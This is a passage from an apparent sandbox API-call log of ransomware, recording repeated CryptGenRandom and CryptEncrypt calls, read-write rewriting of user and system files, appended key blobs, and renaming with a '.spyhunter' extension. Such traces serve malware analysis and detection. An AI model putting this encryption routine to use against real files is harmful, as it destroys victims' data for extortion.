0x2fd0048 [0141.288] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.spyhunter") returned 83 [0141.288] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\folder.ico.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\folder.ico.spyhunter")) returned 1 [0141.288] GetProcessHeap () returned 0x2c0000 [0141.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.288] GetProcessHeap () returned 0x2c0000 [0141.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.288] GetProcessHeap () returned 0x2c0000 [0141.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb5578 | out: hHeap=0x2c0000) returned 1 [0141.288] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3f0 | out: pbBuffer=0x248f3f0) returned 1 [0141.289] GetProcessHeap () returned 0x2c0000 [0141.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.289] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3e8*=0x30) returned 1 [0141.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.290] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi") returned 145 [0141.290] StrStrW (lpFirst="vc_runtimeMinimum_x64.msi", lpSrch=".txt") returned 0x0 [0141.290] GetProcessHeap () returned 0x2c0000 [0141.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0141.290] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f3ac*=0x2800, lpOverlapped=0x0) returned 1 [0141.298] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.298] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f3ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f3ac*=0x2800, lpOverlapped=0x0) returned 1 [0141.298] GetProcessHeap () returned 0x2c0000 [0141.298] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0141.298] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.298] WriteFile (in: hFile=0x158, lpBuffer=0x248f3ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3ac, lpOverlapped=0x0 | out: lpBuffer=0x248f3ec*, lpNumberOfBytesWritten=0x248f3ac*=0x4, lpOverlapped=0x0) returned 1 [0141.299] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f3ac*=0x30, lpOverlapped=0x0) returned 1 [0141.299] CloseHandle (hObject=0x158) returned 1 [0141.358] GetProcessHeap () returned 0x2c0000 [0141.358] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f98f48 [0141.358] wnsprintfW (in: pszDest=0x2f98f48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.spyhunter") returned 155 [0141.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi.spyhunter" (normalized: "c:\\users\\all users\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi.spyhunter")) returned 1 [0141.358] GetProcessHeap () returned 0x2c0000 [0141.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f98f48 | out: hHeap=0x2c0000) returned 1 [0141.359] GetProcessHeap () returned 0x2c0000 [0141.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.359] GetProcessHeap () returned 0x2c0000 [0141.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e17f18 | out: hHeap=0x2c0000) returned 1 [0141.360] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3e8 | out: pbBuffer=0x248f3e8) returned 1 [0141.360] GetProcessHeap () returned 0x2c0000 [0141.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3e0*=0x30) returned 1 [0141.360] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.361] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 74 [0141.361] StrStrW (lpFirst="brndlog.txt", lpSrch=".txt") returned=".txt" [0141.361] lstrlenW (lpString=".txt") returned 4 [0141.361] lstrlenW (lpString=".txt") returned 4 [0141.361] GetProcessHeap () returned 0x2c0000 [0141.361] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0141.361] ReadFile (in: hFile=0xf0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f3a4*=0x2800, lpOverlapped=0x0) returned 1 [0141.362] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.362] WriteFile (in: hFile=0xf0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f3a4*=0x2800, lpOverlapped=0x0) returned 1 [0141.363] ReadFile (in: hFile=0xf0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248f3a4*=0x7a9, lpOverlapped=0x0) returned 1 [0141.363] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffff857, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.363] WriteFile (in: hFile=0xf0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x7a9, lpNumberOfBytesWritten=0x248f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248f3a4*=0x7a9, lpOverlapped=0x0) returned 1 [0141.363] GetProcessHeap () returned 0x2c0000 [0141.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0141.363] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.363] WriteFile (in: hFile=0xf0, lpBuffer=0x248f3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3a4, lpOverlapped=0x0 | out: lpBuffer=0x248f3e4*, lpNumberOfBytesWritten=0x248f3a4*=0x4, lpOverlapped=0x0) returned 1 [0141.363] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f3a4*=0x30, lpOverlapped=0x0) returned 1 [0141.363] CloseHandle (hObject=0xf0) returned 1 [0141.363] GetProcessHeap () returned 0x2c0000 [0141.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f98f48 [0141.363] wnsprintfW (in: pszDest=0x2f98f48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.spyhunter") returned 84 [0141.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.spyhunter")) returned 1 [0141.468] GetProcessHeap () returned 0x2c0000 [0141.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f98f48 | out: hHeap=0x2c0000) returned 1 [0141.468] GetProcessHeap () returned 0x2c0000 [0141.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.468] GetProcessHeap () returned 0x2c0000 [0141.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7ba8 | out: hHeap=0x2c0000) returned 1 [0141.468] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3e8 | out: pbBuffer=0x248f3e8) returned 1 [0141.468] GetProcessHeap () returned 0x2c0000 [0141.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.469] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3e0*=0x30) returned 1 [0141.469] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.469] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl") returned 122 [0141.469] StrStrW (lpFirst="06_Pictures_rated_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0141.469] GetProcessHeap () returned 0x2c0000 [0141.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.469] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f3a4*=0x311, lpOverlapped=0x0) returned 1 [0141.472] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffcef, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.473] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x311, lpNumberOfBytesWritten=0x248f3a4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f3a4*=0x311, lpOverlapped=0x0) returned 1 [0141.473] GetProcessHeap () returned 0x2c0000 [0141.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.473] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.473] WriteFile (in: hFile=0xf0, lpBuffer=0x248f3e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f3a4, lpOverlapped=0x0 | out: lpBuffer=0x248f3e4*, lpNumberOfBytesWritten=0x248f3a4*=0x4, lpOverlapped=0x0) returned 1 [0141.473] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f3a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f3a4*=0x30, lpOverlapped=0x0) returned 1 [0141.473] CloseHandle (hObject=0xf0) returned 1 [0141.473] GetProcessHeap () returned 0x2c0000 [0141.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.473] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.spyhunter") returned 132 [0141.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\06_Pictures_rated_4_or_5_stars.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\06_pictures_rated_4_or_5_stars.wpl.spyhunter")) returned 1 [0141.481] GetProcessHeap () returned 0x2c0000 [0141.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.481] GetProcessHeap () returned 0x2c0000 [0141.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.481] GetProcessHeap () returned 0x2c0000 [0141.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f047c0 | out: hHeap=0x2c0000) returned 1 [0141.481] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3e0 | out: pbBuffer=0x248f3e0) returned 1 [0141.481] GetProcessHeap () returned 0x2c0000 [0141.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.481] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3d8*=0x30) returned 1 [0141.481] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.482] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl") returned 125 [0141.482] StrStrW (lpFirst="04_Music_played_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0141.482] GetProcessHeap () returned 0x2c0000 [0141.482] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.482] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f39c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f39c*=0x504, lpOverlapped=0x0) returned 1 [0141.483] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffafc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.483] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x504, lpNumberOfBytesWritten=0x248f39c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f39c*=0x504, lpOverlapped=0x0) returned 1 [0141.483] GetProcessHeap () returned 0x2c0000 [0141.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.484] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.484] WriteFile (in: hFile=0xf0, lpBuffer=0x248f3dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f39c, lpOverlapped=0x0 | out: lpBuffer=0x248f3dc*, lpNumberOfBytesWritten=0x248f39c*=0x4, lpOverlapped=0x0) returned 1 [0141.484] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f39c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f39c*=0x30, lpOverlapped=0x0) returned 1 [0141.484] CloseHandle (hObject=0xf0) returned 1 [0141.484] GetProcessHeap () returned 0x2c0000 [0141.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.484] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.spyhunter") returned 135 [0141.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\04_Music_played_in_the_last_month.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\04_music_played_in_the_last_month.wpl.spyhunter")) returned 1 [0141.485] GetProcessHeap () returned 0x2c0000 [0141.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.485] GetProcessHeap () returned 0x2c0000 [0141.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.485] GetProcessHeap () returned 0x2c0000 [0141.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f04530 | out: hHeap=0x2c0000) returned 1 [0141.485] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3e0 | out: pbBuffer=0x248f3e0) returned 1 [0141.485] GetProcessHeap () returned 0x2c0000 [0141.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.485] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3d8*=0x30) returned 1 [0141.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.487] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl") returned 122 [0141.487] StrStrW (lpFirst="03_Music_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0141.488] GetProcessHeap () returned 0x2c0000 [0141.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.488] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f39c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f39c*=0x4f3, lpOverlapped=0x0) returned 1 [0141.489] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffb0d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.489] WriteFile (in: hFile=0xf0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4f3, lpNumberOfBytesWritten=0x248f39c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248f39c*=0x4f3, lpOverlapped=0x0) returned 1 [0141.489] GetProcessHeap () returned 0x2c0000 [0141.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.489] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.489] WriteFile (in: hFile=0xf0, lpBuffer=0x248f3dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f39c, lpOverlapped=0x0 | out: lpBuffer=0x248f3dc*, lpNumberOfBytesWritten=0x248f39c*=0x4, lpOverlapped=0x0) returned 1 [0141.489] WriteFile (in: hFile=0xf0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f39c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f39c*=0x30, lpOverlapped=0x0) returned 1 [0141.489] CloseHandle (hObject=0xf0) returned 1 [0141.489] GetProcessHeap () returned 0x2c0000 [0141.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.489] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.spyhunter") returned 132 [0141.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.spyhunter")) returned 1 [0141.490] GetProcessHeap () returned 0x2c0000 [0141.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.490] GetProcessHeap () returned 0x2c0000 [0141.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.490] GetProcessHeap () returned 0x2c0000 [0141.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f043e8 | out: hHeap=0x2c0000) returned 1 [0141.490] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3d8 | out: pbBuffer=0x248f3d8) returned 1 [0141.490] GetProcessHeap () returned 0x2c0000 [0141.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.490] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3d0*=0x30) returned 1 [0141.491] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\02_music_added_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0141.491] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\02_Music_added_in_the_last_month.wpl") returned 124 [0141.491] StrStrW (lpFirst="02_Music_added_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0141.491] GetProcessHeap () returned 0x2c0000 [0141.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.491] ReadFile (in: hFile=0xf0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f394, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248f394*=0x4ff, 